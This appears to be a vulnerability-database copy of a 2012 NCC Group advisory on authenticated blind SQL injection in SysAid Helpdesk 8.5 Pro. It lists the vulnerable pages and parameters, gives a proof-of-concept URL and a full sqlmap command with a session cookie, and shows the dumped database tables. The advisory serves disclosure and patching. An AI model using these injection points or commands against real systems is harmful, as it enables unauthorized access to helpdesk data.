Vulners
Lucene search
SysAid Helpdesk 8.5 Pro SQL Injection
🗓️ 30 Nov 2012 00:00:00Reported by Daniel ComptonType 
packetstorm🔗 packetstormsecurity.com👁 30 Views
`=======
Summary
=======
Name: SysAid Helpdesk Pro - Blind SQL Injection
Release Date: 30 November 2012
Reference: NGS00241
Discoverer: Daniel Compton <[email protected]>
Vendor: SysAid
Vendor Reference:
Systems Affected: SysAid Helpdesk 8.5 Pro
Risk: High
Status: Published
========
TimeLine
========
Discovered: 12 March 2012
Released: 12 March 2012
Approved: 12 March 2012
Reported: 14 March 2012
Fixed: 1 August 2012
Published: 30 November 2012
===========
Description
===========
SysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product.
I. VULNERABILITY
-------------------------
SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.
II. BACKGROUND
-------------------------
SyAid is a fully web based helpdesk solution.
http://www.ilient.com/
III. DESCRIPTION
-------------------------
SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.
=================
Technical Details
=================
IV. PROOF OF CONCEPT
-------------------------
The following URL and parameters have been confirmed to suffer from Blind SQL injection.
/AssetManagementList.jsp (GET Parameter: computerID, group1)
AssetManagementChart.jsp (GET Parameter: group1)
/genericreport (POST Parameter: assetID, customSQL, groupFilter)
CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)
/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices
python sqlmap.py
--url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices"
--dbms=mysql -p computerID
--cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5
Database: ilient [10 tables]
+-----------------------+
| account |
| agreement |
| asset2ci |
| asset_catalog |
| asset_catalog_files |
| asset_catalog_history |
| asset_catalog_links |
| asset_data_day_data |
| asset_data_month_data |
| asset_data_week_data |
+-----------------------+
===============
Fix Information
===============
Fixed in version 8.5.08
http://www.sysaid.com/bugs-fixed-8-5.htm#8508
Download Product Patch:
http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe
NCC Group Research
http://www.nccgroup.com/research
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Nov 2012 00:00Current
0.2Low risk
Vulners AI Score0.2